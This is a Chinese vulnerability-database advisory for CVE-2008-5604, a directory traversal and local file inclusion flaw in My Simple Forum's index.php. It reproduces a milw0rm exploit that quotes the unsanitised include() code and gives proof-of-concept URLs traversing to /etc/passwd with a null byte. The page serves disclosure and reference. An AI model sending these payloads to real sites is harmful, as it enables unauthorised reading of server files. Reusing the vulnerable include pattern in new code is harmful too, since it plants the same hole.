My Simple Forum index.php目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116932 漏洞类型 路径遍历
发布时间 2008-12-04 更新时间 2009-01-29
CVE编号 CVE-2008-5604 CNNVD-ID CNNVD-200812-289
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7342
https://cxsecurity.com/issue/WLB-2008120158
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-289
|漏洞详情
MySimpleForum是一款免费的非常简单的论坛软件。MySimpleForum3.0版本和4.1版本的index.php中存在目录遍历漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助操作参数中德一个..,包含和执行任意本地文件。
|漏洞EXP
/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {
	
	local file inclusion on line 50
	

Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00

# milw0rm.com [2008-12-04]
|参考资料

来源:XF
名称:mysimpleforum-index-file-include(47097)
链接:http://xforce.iss.net/xforce/xfdb/47097
来源:BID
名称:32643
链接:http://www.securityfocus.com/bid/32643
来源:MILW0RM
名称:7342
链接:http://www.milw0rm.com/exploits/7342
来源:SREASON
名称:4765
链接:http://securityreason.com/securityalert/4765
来源:SECUNIA
名称:32984
链接:http://secunia.com/advisories/32984
来源:OSVDB
名称:50433
链接:http://osvdb.org/50433